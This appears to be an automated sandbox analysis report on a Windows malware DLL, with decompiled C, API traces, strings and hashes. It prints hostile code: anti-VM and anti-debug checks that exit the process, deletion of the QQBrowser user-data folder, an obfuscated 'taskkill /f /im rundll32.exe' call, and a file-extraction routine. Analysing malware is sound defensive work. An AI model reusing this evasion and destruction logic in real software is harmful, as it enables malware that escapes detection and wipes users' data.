Sleep.KERNEL32(000003E8,?,00000000,\AppData\Local\Tencent\QQBrowser\User Data\Default,?,C:\Users\,?,?,?,00000002,0000005C), ref: 10005FE6

Part of subcall function 10005B32: __EH_prolog.LIBCMT ref: 10005B37
Part of subcall function 10005B32: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 10005B4E
Part of subcall function 10005B32: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 10005B5C
Part of subcall function 10005B32: ?at@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(-00000001), ref: 10005B67
Part of subcall function 10005B32: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(0000005C), ref: 10005B77
Part of subcall function 10005B32: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,*.*), ref: 10005B8A
Part of subcall function 10005B32: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 10005B9F
Part of subcall function 10005B32: FindFirstFileA.KERNEL32(00000000), ref: 10005BA6
Part of subcall function 10005B32: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 10005BB4
Part of subcall function 10005B32: _strcmpi.MSVCRT ref: 10005BDF
Part of subcall function 10005B32: _strcmpi.MSVCRT ref: 10005BF3
Part of subcall function 10005B32: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?), ref: 10005C0A
Part of subcall function 10005B32: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 10005C18
Part of subcall function 10005B32: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 10005C5D
Part of subcall function 10005B32: FindNextFileA.KERNEL32(00000000,00000010), ref: 10005C6B
Part of subcall function 10005B32: FindClose.KERNEL32(00000000), ref: 10005C7A
Part of subcall function 10005B32: RemoveDirectoryA.KERNEL32(?), ref: 10005C83
Part of subcall function 10005B32: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 10005C93

#800.MFC42 ref: 10006002
#800.MFC42 ref: 1000600E

Strings

\AppData\Local\Tencent\QQBrowser\User Data\Default, xrefs: 10005FC2
QQBrowser.exe, xrefs: 10005F6D
C:\Users\, xrefs: 10005FB7

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$#800$??1?$basic_string@FindH_prolog$?c_str@?$basic_string@D@2@@0@FileFirstHstd@@V10@V?$basic_string@_strcmpi$#1140#537#540#924#926??0?$basic_string@?at@?$basic_string@?length@?$basic_string@CloseCreateD@1@@DirectoryFolderNextPathProcess32RemoveSleepSnapshotSpecialToolhelp32V01@Y?$basic_string@
String ID: C:\Users\$QQBrowser.exe$\AppData\Local\Tencent\QQBrowser\User Data\Default
API String ID: 3922300693-2662846904
Opcode ID: b3e3e2fd39c7373c2ae30b9fc96c4beac812c8a64381c72421bf5f47c6d48341
Instruction ID: 87a81b1a327331843155e263e81d0aab2ba961546dcddd49c5f87034dd1f9ce2
Opcode Fuzzy Hash: b3e3e2fd39c7373c2ae30b9fc96c4beac812c8a64381c72421bf5f47c6d48341
Instruction Fuzzy Hash: CF118E75C10209EAEB14DBA0CC46FEEB778EF10302F104159F201BA0C1DF75AB488B61

Uniqueness

Uniqueness Score: -1.00%

Function 100028B4, Relevance: 24.5, APIs: 1, Strings: 13, Instructions: 27
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100028B4(void* __eflags) {
				signed char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				void* _t17;

				_v8 = _v8 & 0x00000000;
				_v20 = 0x72;
				_v19 = 0x75;
				_v18 = 0x6e;
				_v17 = 0x64;
				_v16 = 0x6c;
				_v15 = 0x6c;
				_v14 = 0x33;
				_v13 = 0x32;
				_v12 = 0x2e;
				_v11 = 0x65;
				_v10 = 0x78;
				_v9 = 0x65;
				_t17 = E1000CC7C( &_v20);
				if(_t17 != 0) {
					return WinExec("taskkill /f /im rundll32.exe", 0);
				}
				return _t17;
			}

0x100028ba
0x100028c2
0x100028c6
0x100028ca
0x100028ce
0x100028d2
0x100028d6
0x100028da
0x100028de
0x100028e2
0x100028e6
0x100028ea
0x100028ee
0x100028f2
0x100028fa
0x00000000
0x10002903
0x1000290a

APIs

Part of subcall function 1000CC7C: LoadLibraryA.KERNEL32(KERNEL32.dll,CreateToolhelp32Snapshot,00000001,00000000,Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij,?,100028F7,?), ref: 1000CC8C
Part of subcall function 1000CC7C: GetProcAddress.KERNEL32(00000000), ref: 1000CC93
Part of subcall function 1000CC7C: #823.MFC42(00000128,?,100028F7,?), ref: 1000CCA7
Part of subcall function 1000CC7C: Process32First.KERNEL32(00000000,00000000), ref: 1000CCB3
Part of subcall function 1000CC7C: _strcmpi.MSVCRT ref: 1000CCC3

WinExec.KERNEL32 ref: 10002903

Strings

e, xrefs: 100028EE
r, xrefs: 100028C2
n, xrefs: 100028CA
e, xrefs: 100028E6
l, xrefs: 100028D6
taskkill /f /im rundll32.exe, xrefs: 100028FE
2, xrefs: 100028DE
d, xrefs: 100028CE
x, xrefs: 100028EA
u, xrefs: 100028C6
3, xrefs: 100028DA
l, xrefs: 100028D2
., xrefs: 100028E2

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: #823AddressExecFirstLibraryLoadProcProcess32_strcmpi
String ID: .$2$3$d$e$e$l$l$n$r$taskkill /f /im rundll32.exe$u$x
API String ID: 2185834290-873388793
Opcode ID: ecdab477309a15f83898c8448c13a1d1123a40a865d63651efbc9e8f9baf14e9
Instruction ID: fd02a4a51a0eaef2b5fedb2877fd1092360e5ac68f83996f601ce8d23dd95b26
Opcode Fuzzy Hash: ecdab477309a15f83898c8448c13a1d1123a40a865d63651efbc9e8f9baf14e9
Instruction Fuzzy Hash: 39F09714D0C2CDE9FB02D3A8880979DBFA95B22648F4880C8D1946A287D7FA5319C776

Uniqueness

Uniqueness Score: -1.00%

Function 100061FE, Relevance: 24.1, APIs: 16, Instructions: 116
stringCOMMON

Download Yara Rule

C-Code - Quality: 18%

			E100061FE() {
				void* _t39;
				intOrPtr* _t40;
				intOrPtr* _t43;
				CHAR* _t45;
				void* _t57;
				void* _t58;
				void* _t59;
				void* _t73;
				void* _t80;
				signed int _t81;
				WCHAR* _t83;
				void* _t84;
				signed int _t85;
				void* _t88;
				void* _t90;
				void* _t91;

				E100158AC(E1001A35A, _t88);
				_t91 = _t90 - 0x34;
				_t39 = _t88 + 0xb;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( *((intOrPtr*)(_t88 + 8)), _t39, _t80, _t84, _t57);
				_t81 = 0;
				 *(_t88 - 4) = 0;
				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
				_t40 = _t39 - 1;
				__imp__??A?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAGI@Z(_t40);
				_t58 = 0x5c;
				if( *_t40 != _t58) {
					__imp__?append@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IG@Z(1, _t58);
				}
				E1000871F(_t88 - 0x30, _t88 - 0xd);
				_t43 = _t88 - 0xe;
				 *(_t88 - 4) = 1;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z(_t43);
				 *(_t88 - 4) = 2;
				_t85 = 0;
				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
				if(_t43 > 0) {
					do {
						__imp__??A?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAGI@Z(_t81);
						if( *_t43 == _t58) {
							_t43 = E10008769(_t88 - 0x30, __eflags, _t88 - 0x40);
							_push(_t58);
						} else {
							__imp__??A?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAGI@Z(_t81);
							_t43 =  *_t43;
							_push(_t43);
						}
						__imp__?append@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IG@Z(1);
						_t81 = _t81 + 1;
						__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
					} while (_t81 < _t43);
				}
				_t59 = E10003D16(_t88 - 0x30);
				while(1) {
					_t45 = E10003D1A(_t88 - 0x30);
					if(_t59 == _t45) {
						break;
					}
					_t73 = _t59;
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t83 = _t45;
					if(_t83 != 0) {
						_t24 = lstrlenW(_t83) + 2; // 0x2
						E100158E0(_t50 + _t24 + 0x00000003 & 0x000000fc, _t73);
						_t45 = E100086A4(_t91, _t83, _t50 + _t24);
					}
					_t85 = (CreateDirectoryA(_t45, 0) & 0xffffff00 | _t48 != 0x00000000) & 0x000000ff;
					_t59 = _t59 + 0x10;
				}
				 *(_t88 - 4) = 1;
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				 *(_t88 - 4) =  *(_t88 - 4) & 0x00000000;
				E1000873A(_t88 - 0x30);
				_t32 = _t88 - 4;
				 *_t32 =  *(_t88 - 4) | 0xffffffff;
				__eflags =  *_t32;
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				 *[fs:0x0] =  *((intOrPtr*)(_t88 - 0xc));
				return _t85;
			}

0x10006203
0x10006208
0x1000620d
0x10006218
0x1000621e
0x10006223
0x10006226
0x1000622c
0x10006231
0x10006239
0x1000623d
0x10006245
0x10006245
0x10006252
0x10006257
0x1000625e
0x10006262
0x1000626b
0x1000626f
0x10006271
0x10006279
0x1000627b
0x1000627f
0x10006288
0x100062a1
0x100062a6
0x1000628a
0x1000628e
0x10006294
0x10006297
0x10006297
0x100062ac
0x100062b5
0x100062b6
0x100062bc
0x1000627b
0x100062c8
0x100062ca
0x100062cd
0x100062d4
0x00000000
0x00000000
0x100062d6
0x100062d8
0x100062de
0x100062e2
0x100062eb
0x100062f6
0x10006300
0x10006300
0x10006313
0x10006316
0x10006316
0x1000631e
0x10006322
0x10006328
0x1000632f
0x10006334
0x10006334
0x10006334
0x1000633b
0x10006349
0x10006354

APIs

__EH_prolog.LIBCMT ref: 10006203
??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00000000,00000000,00000000), ref: 10006218
?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60 ref: 10006226
??A?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAGI@Z.MSVCP60(-00000001), ref: 10006231
?append@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IG@Z.MSVCP60(00000001,0000005C), ref: 10006245
??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 10006262
?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60 ref: 10006271
??A?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAGI@Z.MSVCP60(00000000), ref: 1000627F
??A?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAGI@Z.MSVCP60(00000000), ref: 1000628E
?append@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IG@Z.MSVCP60(00000001,0000005C,?), ref: 100062AC
?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60 ref: 100062B6
?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 100062D8
lstrlenW.KERNEL32(00000000), ref: 100062E5
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 10006308
??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 10006322
??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 1000633B

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$?length@?$basic_string@A?$basic_string@$??0?$basic_string@??1?$basic_string@?append@?$basic_string@G@1@@V12@$?c_str@?$basic_string@CreateDirectoryH_prologlstrlen
String ID:
API String ID: 252390983-0
Opcode ID: 2fdc800ea7990f9277fd22d3f213c3a48d791f54bee5b474f1981c87852f259b
Instruction ID: cfad9bc6783940c9fabcb05860b0e323d96ce90c870948a6a034ef56383d3d42
Opcode Fuzzy Hash: 2fdc800ea7990f9277fd22d3f213c3a48d791f54bee5b474f1981c87852f259b
Instruction Fuzzy Hash: EA416035900529EFEF04EBA4CC99AEE7778FF19345F118018F412A3190EF349A49CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000298B, Relevance: 24.1, APIs: 16, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E1000298B(void* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* _t6;
				void* _t8;
				void* _t12;
				void* _t16;
				void* _t26;
				void* _t28;
				void* _t29;
				void* _t41;

				_t29 = __edx;
				_t20 = __ecx;
				if(E100025FC(__ecx) != 0 || E100027E8(__ecx) != 0 || E100027FB(_t20) != 0 || E10002817(_t20) != 0 || E10002842() != 0) {
					ExitProcess(0);
				}
				E10002506();
				if(E10002550() != 0) {
					ExitProcess(0);
				}
				_t6 = E10002706(_t5);
				_t8 = E10002673(GetCurrentProcessId(), _t7);
				_t41 = _t6;
				_t23 = 0 | _t41 == 0x00000000;
				if(_t41 == 0 == _t8) {
					ExitProcess(0);
				}
				if(E10001F4B(_t23, 4) != 0) {
					ExitProcess(0);
				}
				if(E10001F71() != 0) {
					ExitProcess(0);
				}
				if(E1000213F(_t29, 0xfa) != 0) {
					ExitProcess(0);
				}
				_t12 = E10002289(0x36ee80);
				_pop(_t26);
				if(_t12 != 0) {
					ExitProcess(0);
				}
				if(E100021BC() != 0) {
					ExitProcess(0);
				}
				if(E1000229B(_t26) != 0) {
					ExitProcess(0);
				}
				_push(0x1e);
				if(E100022CE() != 0) {
					ExitProcess(0);
				}
				_t16 = E10002380(_t15, 0xff);
				_pop(_t28);
				if(_t16 != 0) {
					ExitProcess(0);
				}
				if(E1000239E(_t28, _t29) != 0) {
					ExitProcess(0);
				}
				if(E100023DA(_t28) != 0) {
					ExitProcess(0);
				}
				if(E10002451(_t28) != 0) {
					ExitProcess(0);
				}
				_t3 = L10002498();
				if(_t3 != 0) {
					ExitProcess(0);
				}
				return _t3;
			}

0x1000298b
0x1000298b
0x10002993
0x10002ae7
0x10002ae7
0x100029cd
0x100029d9
0x100029dd
0x100029dd
0x100029e4
0x100029f2
0x100029fc
0x100029fe
0x10002a04
0x10002a07
0x10002a07
0x10002a17
0x10002a1a
0x10002a1a
0x10002a27
0x10002a2a
0x10002a2a
0x10002a3d
0x10002a40
0x10002a40
0x10002a4b
0x10002a52
0x10002a53
0x10002a56
0x10002a56
0x10002a63
0x10002a66
0x10002a66
0x10002a73
0x10002a76
0x10002a76
0x10002a7c
0x10002a86
0x10002a89
0x10002a89
0x10002a94
0x10002a9b
0x10002a9c
0x10002a9f
0x10002a9f
0x10002aac
0x10002aaf
0x10002aaf
0x10002abc
0x10002abf
0x10002abf
0x10002acc
0x10002acf
0x10002acf
0x10002ad5
0x10002adc
0x10002adf
0x10002adf
0x10002aee

APIs

ExitProcess.KERNEL32 ref: 10002AE7

Part of subcall function 10002842: RegOpenKeyExA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\BIOS\,00000000,00020019,1000BDED), ref: 10002864
Part of subcall function 10002842: RegQueryValueExA.ADVAPI32(1000BDED,SystemManufacturer,00000000,00000000,?,0000003F), ref: 10002882
Part of subcall function 10002842: strstr.MSVCRT ref: 10002891
Part of subcall function 10002842: RegCloseKey.ADVAPI32(1000BDED,?,?,?,?,?,?,?,?,?,?,?,?,?,100029C5), ref: 100028A0

Part of subcall function 10002506: strlen.MSVCRT ref: 10002522
Part of subcall function 10002506: PathFileExistsA.KERNELBASE(?,?,?,?,?,?,100029D2,00000000,1000BDED), ref: 1000253A
Part of subcall function 10002506: ExitProcess.KERNEL32 ref: 10002548

Part of subcall function 10002550: GetSystemInfo.KERNELBASE(?,00000001,00000000,Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij,?,?,?,?,?,?,?,00000000,10015A2A,1001B420,000000FF), ref: 1000257F
Part of subcall function 10002550: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?,?,?,?,?,00000000,10015A2A,1001B420,000000FF), ref: 10002591
Part of subcall function 10002550: VirtualProtect.KERNELBASE(00000000,?,00000120,?,?,?,?,?,?,?,?,00000000,10015A2A,1001B420,000000FF), ref: 100025AE
Part of subcall function 10002550: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,00000000,10015A2A,1001B420,000000FF,?,100029D7), ref: 100025C1

ExitProcess.KERNEL32 ref: 100029DD
GetCurrentProcessId.KERNEL32(00000001,00000000,1000BDED), ref: 100029EB
ExitProcess.KERNEL32 ref: 10002A07

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Process$Exit$Virtual$AllocCloseCurrentExistsFileFreeInfoOpenPathProtectQuerySystemValuestrlenstrstr
String ID:
API String ID: 852619503-0
Opcode ID: 1e0c889086af3ec7c825705f69af85e23c6afc6b571a36668e177c76631c5296
Instruction ID: 6062efd0eb44ea321b0a35235896501196098d7171baba0820bd3a62c159bd06
Opcode Fuzzy Hash: 1e0c889086af3ec7c825705f69af85e23c6afc6b571a36668e177c76631c5296
Instruction Fuzzy Hash: AA31613D305AA66BFA52E7B19E4A76F2699EF0E2C1F024024F911D109EFF24D9024777

Uniqueness

Uniqueness Score: -1.00%

Function 10010F9B, Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E10010F9B(intOrPtr* __ecx, void* __edx, void* _a4, char _a7, char* _a8, char _a11, signed int _a12, intOrPtr _a16) {
				long _v8;
				char _v267;
				char _v268;
				struct _FILETIME _v284;
				struct _FILETIME _v292;
				struct _FILETIME _v300;
				long _v304;
				char _v568;
				char _v828;
				intOrPtr _t78;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr _t96;
				intOrPtr _t97;
				char _t100;
				void* _t112;
				void* _t113;
				int _t124;
				long _t131;
				intOrPtr _t136;
				char* _t137;
				char* _t144;
				void* _t148;
				char* _t150;
				void* _t154;
				signed int _t155;
				long _t156;
				void* _t157;
				char* _t158;
				long _t159;
				intOrPtr* _t161;
				long _t162;
				void* _t163;
				void* _t164;

				_t154 = __edx;
				_t139 = __ecx;
				_t136 = _a16;
				_t161 = __ecx;
				if(_t136 == 3) {
					_t78 =  *((intOrPtr*)(__ecx + 4));
					_t155 = _a4;
					__eflags = _t155 - _t78;
					if(_t155 == _t78) {
						L14:
						_t156 = E100104D6(_t139,  *_t161, _a8, _a12,  &_a7);
						__eflags = _t156;
						if(_t156 <= 0) {
							E100107A2( *_t161);
							_t14 = _t161 + 4;
							 *_t14 =  *(_t161 + 4) | 0xffffffff;
							__eflags =  *_t14;
						}
						__eflags = _a7;
						if(_a7 == 0) {
							__eflags = _t156;
							if(_t156 <= 0) {
								__eflags = _t156 - 0xffffff96;
								return ((0 | _t156 != 0xffffff96) - 0x00000001 & 0xfb001000) + 0x5000000;
							}
							return 0x600;
						} else {
							L17:
							return 0;
						}
					}
					__eflags = _t78 - 0xffffffff;
					if(_t78 != 0xffffffff) {
						E100107A2( *__ecx);
						_pop(_t139);
					}
					_t89 =  *_t161;
					 *(_t161 + 4) =  *(_t161 + 4) | 0xffffffff;
					__eflags = _t155 -  *((intOrPtr*)(_t89 + 4));
					if(_t155 >=  *((intOrPtr*)(_t89 + 4))) {
						L3:
						return 0x10000;
					} else {
						__eflags = _t155 -  *((intOrPtr*)(_t89 + 0x10));
						if(_t155 >=  *((intOrPtr*)(_t89 + 0x10))) {
							L11:
							_t91 =  *_t161;
							__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t155;
							if( *((intOrPtr*)(_t91 + 0x10)) >= _t155) {
								E10010373( *_t161,  *((intOrPtr*)(_t161 + 0x138)));
								 *(_t161 + 4) = _t155;
								_pop(_t139);
								goto L14;
							}
							E100100E2(_t91);
							L10:
							goto L11;
						}
						E100100A1(_t139, _t89);
						goto L10;
					}
				}
				if(_t136 == 2 || _t136 == 1) {
					__eflags =  *(_t161 + 4) - 0xffffffff;
					if( *(_t161 + 4) != 0xffffffff) {
						E100107A2( *_t161);
						_pop(_t139);
					}
					_t96 =  *_t161;
					_t157 = _a4;
					 *(_t161 + 4) =  *(_t161 + 4) | 0xffffffff;
					__eflags = _t157 -  *((intOrPtr*)(_t96 + 4));
					if(_t157 >=  *((intOrPtr*)(_t96 + 4))) {
						goto L3;
					} else {
						__eflags = _t157 -  *((intOrPtr*)(_t96 + 0x10));
						if(_t157 >=  *((intOrPtr*)(_t96 + 0x10))) {
							L27:
							_t97 =  *_t161;
							__eflags =  *((intOrPtr*)(_t97 + 0x10)) - _t157;
							if( *((intOrPtr*)(_t97 + 0x10)) >= _t157) {
								E100109FE(_t161, _t154, _t157,  &_v568);
								__eflags = _v304 & 0x00000010;
								if((_v304 & 0x00000010) == 0) {
									__eflags = _t136 - 1;
									if(_t136 != 1) {
										_t158 = _a8;
										_t137 = _t158;
										_t144 = _t158;
										_t100 =  *_t158;
										while(1) {
											__eflags = _t100;
											if(_t100 == 0) {
												break;
											}
											__eflags = _t100 - 0x2f;
											if(_t100 == 0x2f) {
												L44:
												_t34 =  &(_t144[1]); // 0x1002699e
												_t137 = _t34;
												L45:
												_t35 =  &(_t144[1]); // 0x0
												_t100 =  *_t35;
												_t144 =  &(_t144[1]);
												continue;
											}
											__eflags = _t100 - 0x5c;
											if(_t100 != 0x5c) {
												goto L45;
											}
											goto L44;
										}
										strcpy( &_v268, _t158);
										__eflags = _t137 - _t158;
										if(_t137 != _t158) {
											 *(_t163 + _t137 - _t158 - 0x108) =  *(_t163 + _t137 - _t158 - 0x108) & 0x00000000;
											__eflags = _v268 - 0x2f;
											if(_v268 == 0x2f) {
												L56:
												wsprintfA( &_v828, "%s%s",  &_v268, _t137);
												E10010ED5(0,  &_v268);
												_t164 = _t164 + 0x18;
												L49:
												__eflags = 0;
												_t112 = CreateFileA( &_v828, 0x40000000, 0, 0, 2, _v304, 0);
												L50:
												__eflags = _t112 - 0xffffffff;
												_a4 = _t112;
												if(_t112 != 0xffffffff) {
													_t113 = E10010373( *_t161,  *((intOrPtr*)(_t161 + 0x138)));
													__eflags =  *(_t161 + 0x13c);
													_pop(_t148);
													if( *(_t161 + 0x13c) == 0) {
														L10015806();
														_t148 = 0x4000;
														 *(_t161 + 0x13c) = _t113;
													}
													_t60 =  &_a12;
													 *_t60 = _a12 & 0x00000000;
													__eflags =  *_t60;
													while(1) {
														_t159 = E100104D6(_t148,  *_t161,  *(_t161 + 0x13c), 0x4000,  &_a11);
														_t164 = _t164 + 0x10;
														__eflags = _t159 - 0xffffff96;
														if(_t159 == 0xffffff96) {
															break;
														}
														__eflags = _t159;
														if(__eflags < 0) {
															L68:
															_a12 = 0x5000000;
															L71:
															__eflags = _a16 - 1;
															if(_a16 != 1) {
																CloseHandle(_a4);
															}
															E100107A2( *_t161);
															return _a12;
														}
														if(__eflags <= 0) {
															L64:
															__eflags = _a11;
															if(_a11 != 0) {
																SetFileTime(_a4,  &_v292,  &_v300,  &_v284);
																goto L71;
															}
															__eflags = _t159;
															if(_t159 == 0) {
																goto L68;
															}
															continue;
														}
														_t124 = WriteFile(_a4,  *(_t161 + 0x13c), _t159,  &_v8, 0);
														__eflags = _t124;
														if(_t124 == 0) {
															_a12 = 0x400;
															goto L71;
														}
														goto L64;
													}
													_a12 = 0x1000;
													goto L71;
												}
												return 0x200;
											}
											__eflags = _v268 - 0x5c;
											if(_v268 == 0x5c) {
												goto L56;
											}
											__eflags = _v268;
											if(_v268 == 0) {
												L48:
												_t160 = _t161 + 0x140;
												wsprintfA( &_v828, "%s%s%s", _t161 + 0x140,  &_v268, _t137);
												E10010ED5(_t160,  &_v268);
												_t164 = _t164 + 0x1c;
												goto L49;
											}
											__eflags = _v267 - 0x3a;
											if(_v267 != 0x3a) {
												goto L48;
											}
											goto L56;
										}
										_t37 =  &_v268;
										 *_t37 = _v268 & 0x00000000;
										__eflags =  *_t37;
										goto L48;
									}
									_t112 = _a8;
									goto L50;
								}
								__eflags = _t136 - 1;
								if(_t136 == 1) {
									goto L17;
								}
								_t150 = _a8;
								_t131 =  *_t150;
								__eflags = _t131 - 0x2f;
								if(_t131 == 0x2f) {
									L35:
									_push(_t150);
									_push(0);
									L37:
									E10010ED5();
									goto L17;
								}
								__eflags = _t131 - 0x5c;
								if(_t131 == 0x5c) {
									goto L35;
								}
								__eflags = _t131;
								if(_t131 == 0) {
									L36:
									_t162 = _t161 + 0x140;
									__eflags = _t162;
									_push(_t150);
									_push(_t162);
									goto L37;
								}
								__eflags = _t150[1] - 0x3a;
								if(_t150[1] != 0x3a) {
									goto L36;
								}
								goto L35;
							}
							E100100E2(_t97);
							L26:
							goto L27;
						}
						E100100A1(_t139, _t96);
						goto L26;
					}
				} else {
					goto L3;
				}
			}

0x10010f9b
0x10010f9b
0x10010fa5
0x10010fad
0x10010faf
0x10010fcd
0x10010fd0
0x10010fd3
0x10010fd5
0x1001101c
0x1001102d
0x10011032
0x10011034
0x10011038
0x1001103d
0x1001103d
0x1001103d
0x10011041
0x10011042
0x10011046
0x1001104f
0x10011051
0x1001105f
0x00000000
0x1001106b
0x00000000
0x10011048
0x10011048
0x00000000
0x10011048
0x10011046
0x10010fd7
0x10010fda
0x10010fde
0x10010fe3
0x10010fe3
0x10010fe4
0x10010fe6
0x10010fea
0x10010fed
0x10010fc3
0x00000000
0x10010fef
0x10010fef
0x10010ff2
0x10010ffb
0x10010ffb
0x10010ffd
0x10011000
0x10011012
0x10011018
0x1001101b
0x00000000
0x1001101b
0x10011003
0x10010ffa
0x00000000
0x10010ffa
0x10010ff5
0x00000000
0x10010ff5
0x10010fed
0x10010fb4
0x10011075
0x10011079
0x1001107d
0x10011082
0x10011082
0x10011083
0x10011085
0x10011088
0x1001108c
0x1001108f
0x00000000
0x10011095
0x10011095
0x10011098
0x100110a1
0x100110a1
0x100110a3
0x100110a6
0x100110ba
0x100110bf
0x100110c6
0x10011101
0x10011104
0x1001110e
0x10011111
0x10011113
0x10011115
0x10011117
0x10011117
0x10011119
0x00000000
0x00000000
0x1001111b
0x1001111d
0x10011123
0x10011123
0x10011123
0x10011126
0x10011126
0x10011126
0x10011129
0x00000000
0x10011129
0x1001111f
0x10011121
0x00000000
0x00000000
0x00000000
0x10011121
0x10011134
0x1001113a
0x1001113d
0x100111ac
0x100111b4
0x100111bb
0x100111e0
0x100111f4
0x10011203
0x10011208
0x10011177
0x10011177
0x10011190
0x10011196
0x10011196
0x10011199
0x1001119c
0x10011218
0x1001121d
0x10011225
0x1001122b
0x1001122e
0x10011233
0x10011234
0x10011234
0x1001123a
0x1001123a
0x1001123a
0x1001123e
0x10011250
0x10011252
0x10011255
0x10011258
0x00000000
0x00000000
0x1001125a
0x1001125c
0x1001128f
0x1001128f
0x100112bf
0x100112bf
0x100112c3
0x100112c8
0x100112c8
0x100112d0
